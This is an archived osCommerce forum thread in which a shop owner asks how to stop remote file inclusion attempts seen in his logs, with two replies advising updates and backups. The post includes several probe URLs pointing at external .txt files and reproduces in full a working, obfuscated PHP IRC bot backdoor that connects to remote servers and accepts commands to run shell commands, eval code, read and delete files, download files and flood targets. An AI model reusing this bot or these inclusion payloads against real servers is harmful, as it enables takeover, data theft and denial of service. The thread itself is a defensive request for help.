Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Hacker access to my SQL how to avoid?


maximax

Recommended Posts

Hello all together,

 

I'm concerned about access i found in the tracking and supertracking informations all days !

 

There always apear thing like :

 

1.)

 

Landing Page: /Shop/index.php?language=es/index.php?set=http://xredrum.com/id.txt?

 

2.)

 

Landing Page: /Shop/index.php?language=http://www.jrnet.com/n?

 

3.)

 

Landing Page: /Shop/index.php?cPath=http://amyru.h18.ru/images/cs.txt?

 

Special to #3, I foound out following addicional information:

====================================================

The Who is Domain Record:

 

domain: H18.RU

type: CORPORATE

nserver: ns1.agava.net.ru.

nserver: ns2.agava.net.ru.

state: REGISTERED, DELEGATED

org: AGAVA Software Ltd.

phone: +7 095 4081790

phone: +7 095 4081172

fax-no: +7 095 4086765

e-mail: Whois Privacy and Spam Prevention by DomainTools.com

registrar: R01-REG-RIPN

created: 2004.10.11

paid-till: 2008.10.11

source: TC-RIPN

 

Last updated on 2007.10.21 20:54:35 MSK/MSD

================================================================

 

The text file this person run over my server is the following:

 

http://amyru.h18.ru/images/cs.txt?

 

 

"cs.txt" TEXT FILE: Looks like the folowing CODE

 

START

======================================================================

<? set_time_limit(0); ini_set("max_execution_time",0); set_magic_quotes_runtime(0); ini_set('output_buffering',0);
error_reporting(0); ignore_user_abort(); $cd263a566 = array ( "po" => 8080, "sp" => "qdHH3KWXlISXmA==",
"ch" => "WY/U", "ke" => "o9CZ0qGWjA==", "ha" => "ZaaOi2pjTlGFm1dS", "pa" => "b9DInqVXWlRWW2uGbGVmaJlpmKRoomrPnWmgmKqpxq0=",
"tr" => "*", "mrnd" => 9, "mo" => "LXggaQ==", "ve" => "bUlSQyA2LjI0IEJZIEtoYWxlZCBNYXJkYW0tQmF5"
); function nc8a89c2c($d341be97d) { $d341be97d = str_replace(" ", "", $d341be97d); return $d341be97d;
} function p9ccc9fce($d341be97d) { $d341be97d = base64_decode(nc8a89c2c($d341be97d)); return $d341be97d;
} function y658cce19() { global $cd263a566; $gee11cbb1 = array(); $cd707b814 = ""; $w59b51417 = array("qeHS2LmTkISHiqZRq5qYmKGnY8+i2Q==", "o+XR37OMh5OQhpaIYqyYmZeiqJqW26M=", "mtrXnm6FlIRSk6g=", "mtrXnW6FlIRSk6g=", "mtrXnG6FlIRSk6g=", "mtrXm26FlIRSk6g=", "qdrJ3W6HkoyUU6GIqA==", "qdrJ3W6SlIiSiaGWYpeY", "pN/J3XFRiIdSh5+YmaGcophil9E=", "rs3R47hRiJGNlWGRmak=");
shuffle($w59b51417); if(($x351a1d2a = fsockopen(u39c63ddb($w59b51417[0]),$cd263a566['po'],$k70106d0d,$q809b1abe,15))) {
$q80521467 = gd9889714($cd263a566['mrnd']); if (strlen($cd263a566['sp'])>0) { o56eacb30($x351a1d2a, p9ccc9fce("UEFTUw==")." ".u39c63ddb($cd263a566['sp']));
} o56eacb30($x351a1d2a, p9ccc9fce("VVNFUg==")." ".rfb0daa8f($cd263a566['mrnd'])." 127.0.0.1 localhost :$q80521467");
o56eacb30($x351a1d2a, p9ccc9fce("TklDSw==")." $q80521467"); while (!feof($x351a1d2a)) { $e7fabc140 = trim(fgets($x351a1d2a,512));
$i6e2baaf3 = explode(" ",$e7fabc140); if(($e7fabc140 == $cd707b814)) continue; if (isset($i6e2baaf3[0]) && $i6e2baaf3[0] == p9ccc9fce("UElORw==")) {
o56eacb30($x351a1d2a, p9ccc9fce("UE9ORw==")." ".$i6e2baaf3[1]); } else if (isset($i6e2baaf3[1]) && $i6e2baaf3[1] == p9ccc9fce("MDAx")) {
o56eacb30($x351a1d2a, p9ccc9fce("TU9ERQ==")." $q80521467 ".p9ccc9fce($cd263a566['mo'])); o56eacb30($x351a1d2a, p9ccc9fce("Sk9JTg==")." ".u39c63ddb($cd263a566['ch'])." ".u39c63ddb($cd263a566['ke']));
} else if(isset($sdfff0a7f[1]) && $sdfff0a7f[1] == p9ccc9fce("NDMz")) { o56eacb30($x351a1d2a, p9ccc9fce("TklDSw==")." $q80521467");
} else if (isset($i6e2baaf3[1]) && isset($gee11cbb1[$i6e2baaf3[1]])) { unset($gee11cbb1[$i6e2baaf3[1]]);
} else if (isset($i6e2baaf3[1]) && ($i6e2baaf3[1] == p9ccc9fce("UFJJVk1TRw==") || $i6e2baaf3[1] == p9ccc9fce("MzMy"))) {
$o78e73102 = strstr($e7fabc140," :"); $o78e73102 = substr($o78e73102,2); $sdfff0a7f = explode(" ",$o78e73102);
$p67b3dba8 = $i6e2baaf3[0]; $a7c6483dd = explode("!",$p67b3dba8); $a7c6483dd = substr($a7c6483dd[0],1);
$y73be252c = FALSE; if ($sdfff0a7f[0] == "\1".p9ccc9fce("VkVSU0lPTg==")."\1") { o56eacb30($x351a1d2a,"NOTICE ".$a7c6483dd." :\1".p9ccc9fce("VkVSU0lPTg==")." ".p9ccc9fce($cd263a566['ve'])."\1");
} for ($r865c0c0b=0;$r865c0c0b<count($sdfff0a7f);$r865c0c0b++) { if($sdfff0a7f[$r865c0c0b] == "-s") {
$y73be252c = TRUE; } } if ($i6e2baaf3[1] == p9ccc9fce("MzMy")) { $w01b6e203 = $i6e2baaf3[3]; } elseif ($i6e2baaf3[2] == $q80521467) {
$w01b6e203 = $a7c6483dd; } else { $w01b6e203 = $i6e2baaf3[2]; } if ($sdfff0a7f[0] == PHP_OS) { array_shift($sdfff0a7f);
} if (substr($sdfff0a7f[0],0,1) == $cd263a566['tr']) { if (isset($gee11cbb1[$p67b3dba8]) || $i6e2baaf3[1] == "332") {
switch (substr($sdfff0a7f[0],1)) { case p9ccc9fce("bG8="): if ($i6e2baaf3[1] != p9ccc9fce("MzMy")) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "out"); } break; case p9ccc9fce("ZDFlbm93"): o56eacb30($x351a1d2a, p9ccc9fce("UVVJVCA6SSBRVUlU"));
fclose($x351a1d2a); exit(0); break; case p9ccc9fce("cmF3"): if (count($sdfff0a7f)>1) { o56eacb30($x351a1d2a, substr($o78e73102,strlen($sdfff0a7f[0])));
} break; case p9ccc9fce("bHM="): if (isset($sdfff0a7f[1])) { $z954eef6d = $sdfff0a7f[1]; } else { $z954eef6d = getcwd();
} if (is_dir($z954eef6d)) { if (($g73600783 = opendir($z954eef6d))) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Dir// Now listing: \2".$z954eef6d."\2");
while (($a435ed7e9 = readdir($g73600783)) !== FALSE) { if ($a435ed7e9 != "." && $a435ed7e9 != "..") {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "> (".filetype($z954eef6d."/".$a435ed7e9).") $a435ed7e9");
sleep(1); } } closedir(); } else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Dir// Unable to list contents of \2".$z954eef6d."\2");
} } else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Dir// \2".$z954eef6d."\2 is not a dir!");
} break; case p9ccc9fce("Y2F0"): if (count($sdfff0a7f) > 1) { if (is_file($sdfff0a7f[1])) { if (($p0666f0ac = fopen($sdfff0a7f[1],"r"))) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CAT// Now reading file: \2".$sdfff0a7f[1]."\2"); while(!feof($p0666f0ac)) {
$f6438c669 = trim(fgets($p0666f0ac,256)); yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "> $f6438c669");
sleep(1); } yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "> [EOF]"); } else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CAT// Couldn't open \2".$sdfff0a7f[1]."\2 for reading.");
} } else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CAT// \2".$sdfff0a7f[1]."\2 is not a file");
} } break; case p9ccc9fce("cHdk"): yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "PWD// Current dir: ".getcwd());
break; case p9ccc9fce("Y2Q="): if (count($sdfff0a7f) > 1) { if (chdir($sdfff0a7f[1])) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CD// Changed dir to ".$sdfff0a7f[1]);
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CD// Failed to change dir"); } } break; case p9ccc9fce("cm0="):
if (count($sdfff0a7f) > 1) { if (unlink($sdfff0a7f[1])) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "RM// Deleted \2".$sdfff0a7f[1]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "RM// Failed to delete \2".$sdfff0a7f[1]."\2");
} } break; case p9ccc9fce("dG91Y2g="): if (count($sdfff0a7f) > 1) { if (touch($sdfff0a7f[1])) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Touch// Touched \2".$sdfff0a7f[1]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Touch// Failed to touch \2".$sdfff0a7f[1]."\2");
} } break; case p9ccc9fce("c3ltbGluaw=="): if (count($sdfff0a7f) > 2) { if (symlink($sdfff0a7f[1],$sdfff0a7f[2])) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "SymLink// Symlinked \2".$sdfff0a7f[2]."\2 To \2".$sdfff0a7f[1]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "SymLink// Failed to link \2".$sdfff0a7f[2]."\2 To \2".$sdfff0a7f[1]."\2");
} } break; case p9ccc9fce("Y2hvd24="): if (count($sdfff0a7f) > 2) { if (chown($sdfff0a7f[1],$sdfff0a7f[2])) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Chown// Chowned \2".$sdfff0a7f[1]."\2 To \2".$sdfff0a7f[2]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Chown// Failed to chown \2".$sdfff0a7f[1]."\2 To \2".$sdfff0a7f[2]."\2");
} } break; case p9ccc9fce("Y2htb2Q="): if (count($sdfff0a7f) > 2) { if(chmod($sdfff0a7f[1],$sdfff0a7f[2])) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Chmod// Chmodded \2".$sdfff0a7f[1]."\2 with permissions \2".$sdfff0a7f[2]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Chmod// Failed to chmod \2".$sdfff0a7f[1]."\2");
} } break; case p9ccc9fce("bWtkaXI="): if (count($sdfff0a7f) > 1) { if (mkdir($sdfff0a7f[1])) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "MKDir// Created directory \2".$sdfff0a7f[1]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "MKDir// Failed to create directory \2".$sdfff0a7f[1]."\2");
} } break; case p9ccc9fce("cm1k"): if (count($sdfff0a7f)>1) { if (rmdir($sdfff0a7f[1])) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "RMDir// Removed directory \2".$sdfff0a7f[1]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "RMDir// Failed to remove directory \2".$sdfff0a7f[1]."\2");
} } break; case p9ccc9fce("Y3A="): if (count($sdfff0a7f) > 2) { if (copy($sdfff0a7f[1], $sdfff0a7f[2])) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CP// Copied \2".$sdfff0a7f[1]."\2 to \2".$sdfff0a7f[2]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "CP// Failed to copy \2".$sdfff0a7f[1]."\2 to \2".$sdfff0a7f[2]."\2");
} } break; case p9ccc9fce("bWFpbA=="): if (count($sdfff0a7f)>4) { $t099fb995 = "From: <".$sdfff0a7f[2].">\r\n";
if (mail($sdfff0a7f[1], $sdfff0a7f[3], substr($o78e73102,$sdfff0a7f[4]), $t099fb995)) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Mailer// Message sent to \2".$sdfff0a7f[1]."\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Mailer// Send failure"); } } break; case p9ccc9fce("bWttZDU="):
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "MD5// ".md5($sdfff0a7f[1])); break; case p9ccc9fce("ZG5z"):
if (isset($sdfff0a7f[1])) { $r957b527b = explode(".",$sdfff0a7f[1]); if (count($r957b527b)==4 && is_numeric($r957b527b[0]) && is_numeric($r957b527b[1]) && is_numeric($r957b527b[2]) && is_numeric($r957b527b[3])) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "DNS// ".$sdfff0a7f[1]." -> ".gethostbyaddr($sdfff0a7f[1]));
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "DNS// ".$sdfff0a7f[1]." -> ".gethostbyname($sdfff0a7f[1]));
} } break; case p9ccc9fce("b3BtZQ=="): o56eacb30($x351a1d2a, "mode ".$i6e2baaf3[2]." +o $a7c6483dd");
break; case p9ccc9fce("cmVzdGFydA=="): o56eacb30($x351a1d2a, p9ccc9fce("UVVJVCA6UVVJVC4uLg==")); fclose($x351a1d2a);
y658cce19(); break; case p9ccc9fce("cm4="): if(isset($sdfff0a7f[1])) { $q80521467 = gd9889714((int)$sdfff0a7f[1]);
o56eacb30($x351a1d2a, p9ccc9fce("TklDSw==")." $q80521467"); } else { $q80521467 = gd9889714($cd263a566['mrnd']);
o56eacb30($x351a1d2a, p9ccc9fce("TklDSw==")." $q80521467"); } break; case p9ccc9fce("cGhw"): if (count($sdfff0a7f) > 1) {
eval(substr($o78e73102,strlen($sdfff0a7f[0]))); } break; case p9ccc9fce("Z2V0"): if (count($sdfff0a7f) > 2) {
if (!($p0666f0ac = fopen($sdfff0a7f[2],"w"))) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Get// Permission denied");
} else { if (!($qb5eda0a7 = file($sdfff0a7f[1]))) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Get// Bad URL/DNS error");
} else { for ($r865c0c0b = 0; $r865c0c0b < count($qb5eda0a7); $r865c0c0b++) { fwrite($p0666f0ac,$qb5eda0a7[$r865c0c0b]);
} yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Get// \2".$sdfff0a7f[1]."\2 downloaded to \2".$sdfff0a7f[2]."\2");
} fclose($p0666f0ac); } } break; case p9ccc9fce("bmk="): yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "NetInfo// IP: ".$_SERVER['SERVER_ADDR']." Hostname: ".$_SERVER['SERVER_NAME']);
break; case p9ccc9fce("c2k="): yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Sysinfo// [User: ".get_current_user()."] [PID: ".getmypid()."] [Version: PHP ".phpversion()."] [OS: ".PHP_OS."] [Server_software: ".$_SERVER['SERVER_SOFTWARE']."] [Server_name: ".$_SERVER['SERVER_NAME']."] [Admin: ".$_SERVER['SERVER_ADMIN']."] [Docroot: ".$_SERVER['DOCUMENT_ROOT']."] [HTTP Host: ".$_SERVER['HTTP_HOST']."] [URL: ".$_SERVER['REQUEST_URI']."]");
break; case p9ccc9fce("cG9ydG9wZW4="): if (isset($sdfff0a7f[1],$sdfff0a7f[2])) { if (fsockopen($sdfff0a7f[1],(int)$sdfff0a7f[2],$k56bd7107,$d341be97d,5)) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "PortChk// ".$sdfff0a7f[1].":".$sdfff0a7f[2]." is \2Open\2");
} else { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "PortChk// ".$sdfff0a7f[1].":".$sdfff0a7f[2]." is \2Closed\2");
} } break; case p9ccc9fce("dW5hbWU="): yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Uname// ".php_uname());
break; case p9ccc9fce("aWQ="): yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "ID// ".getmypid()); break;
case p9ccc9fce("Y21k"): if (count($sdfff0a7f)>1) { $j1dccadfe = popen(substr($o78e73102,strlen($sdfff0a7f[0])),"r");
while (!feof($j1dccadfe)) { $a734515cb = trim(fgets($j1dccadfe,512)); if (strlen($a734515cb)>0) { yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "> ".$a734515cb);
sleep(1); } } yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "> [EOF]"); } break; case p9ccc9fce("ZXhlYw=="):
v54d54a12(substr($o78e73102,strlen($sdfff0a7f[0]))); break; case p9ccc9fce("aGl0"): if (!$sdfff0a7f[1] || !$sdfff0a7f[2]) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Hit// Need some cmds."); break; } if ($sdfff0a7f[2] > 100) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Hit// too much sockets. setting to 100."); $sdfff0a7f[2] = 100;
} yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Hit// $sdfff0a7f[1] with $sdfff0a7f[2] pkts."); lbeee853c($sdfff0a7f[1],$sdfff0a7f[2]);
break; } } else { switch(substr($sdfff0a7f[0],1)) { case p9ccc9fce("Kg=="): if (isset($sdfff0a7f[1]) && md5($sdfff0a7f[1]) == u39c63ddb($cd263a566['pa']) && preg_match(u39c63ddb($cd263a566['ha']),$p67b3dba8)) {
yf2f4e964($x351a1d2a, $y73be252c, $w01b6e203, "Ready// Login Ok: \2$a7c6483dd\2"); $gee11cbb1[$p67b3dba8] = TRUE;
} else { yf2f4e964($x351a1d2a, FALSE, $cd263a566['ch'], "Ready// Login rejected: \2$a7c6483dd\2"); }
break; } } } } $cd707b814 = $e7fabc140; } fclose($x351a1d2a); sleep(3); y658cce19(); } else { shuffle($w59b51417);
y658cce19(); } } function o56eacb30($x317d37b0, $o78e73102) { fwrite($x317d37b0,"$o78e73102\r\n"); }
function yf2f4e964($x317d37b0, $y73be252c, $w01b6e203, $o78e73102) { if($y73be252c != TRUE) { o56eacb30($x317d37b0, p9ccc9fce("UFJJVk1TRw==")." $w01b6e203 :$o78e73102");
} } function gd9889714($ufac65290) { for ($r865c0c0b = 0; $r865c0c0b < $ufac65290; $r865c0c0b++) $v2cb9df98 .= chr(mt_rand(0,25)+97);
if (posix_getegid() == 0) $v2cb9df98 = "r-".$v2cb9df98; return $v2cb9df98; } function v54d54a12($p111ca5df)
{ $z9b207167 = ''; if (!empty($p111ca5df)) { if(function_exists('exec')) { @exec($p111ca5df,$z9b207167);
$z9b207167 = join("\n",$z9b207167); } elseif(function_exists('shell_exec')) { $z9b207167 = @shell_exec($p111ca5df);
} elseif(function_exists('system')) { @ob_start(); @system($p111ca5df); $z9b207167 = @ob_get_contents();
@ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($p111ca5df); $z9b207167 = @ob_get_contents();
@ob_end_clean(); } elseif(@is_resource($t8fa14cdd = @popen($p111ca5df,"r"))) { $z9b207167 = ""; while(!@feof($t8fa14cdd)) { $z9b207167 .= @fread($t8fa14cdd,1024); }
@pclose($t8fa14cdd); } } return $z9b207167; } function lbeee853c($p67b3dba8,$dc9c17db3) { v54d54a12("ping -p 2222f2b22 -s 512 -t 255 -c $dc9c17db3 $p67b3dba8");
} function u39c63ddb($ac7a1ddb1) { $bb4a88417 = ''; $ac7a1ddb1 = base64_decode($ac7a1ddb1); for($r865c0c0b=0; $r865c0c0b<strlen($ac7a1ddb1); $r865c0c0b++) {
$ra87deb01 = substr($ac7a1ddb1, $r865c0c0b, 1); $lae0e1268 = substr(p9ccc9fce("bGRqQCMkIyQlMyM0NTM0MzQ1bDNsNmpsNGs1dHJld3VpdHJlaXRyZXRFcnR3ZXJUd2VydCQlMzQz
MjQ1NmtsJl4qNjc4Njc4XiYqXiY4NWo0bGs2ajM0bDZqbDM0Ng=="), ($r865c0c0b % strlen(p9ccc9fce("bGRqQCMkIyQlMyM0NTM0MzQ1bDNsNmpsNGs1dHJld3VpdHJlaXRyZXRFcnR3ZXJUd2VydCQlMzQz
MjQ1NmtsJl4qNjc4Njc4XiYqXiY4NWo0bGs2ajM0bDZqbDM0Ng==")))-1, 1);
$ra87deb01 = chr(ord($ra87deb01)-ord($lae0e1268)); $bb4a88417.=$ra87deb01; } return $bb4a88417; } function rfb0daa8f($ufac65290) {
$v2cb9df98 = ""; for ($r865c0c0b=0;$r865c0c0b<$ufac65290; $r865c0c0b++) $v2cb9df98 .= chr(mt_rand(0,25)+97);
return $v2cb9df98; } y658cce19(); ?>

================================================================================

=================

END

 

Iam not PHP expert but it looks to me that OSC 2.2 is not save enough

 

THIS GUY HAD ACCESS TO MY SQL --> Stolen anything ? !!! ?

 

How to STOP this things please HELP!

 

Does anybody know what to do? Please HELP..... a contribution I dit not found,

 

To include them in my .htaccess file with "deny" do not help they come along with different IP and domains all day long.

 

Iam sure that other OSC useres have the same problem!

 

Regards

maximax

Link to comment
Share on other sites

We had such posts a couple of times ago, but what makes you sure that those guys had access to your SQL? Did you notice any changes to your database or files? Most likely not. What they're trying to do is inserting code via GET parameters. Since the OSC code doesn't accept nor evaluate this code, nothing happens at all. It's just annoying. As far as i know the known security risks of OSC has been erased with RC1, so you might take into consideration to update your code.

Link to comment
Share on other sites

Good advise -back-up your dbase.My was wipe out,but I restored from back-up.Change your password for vdec or control pane(depend of host).On the internet - there not such of thing as safe software.Back-up your store.I do it very time I do a changes and keep original copy.I back-up my dbase every day.It takes a min and save a lot of problems.

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...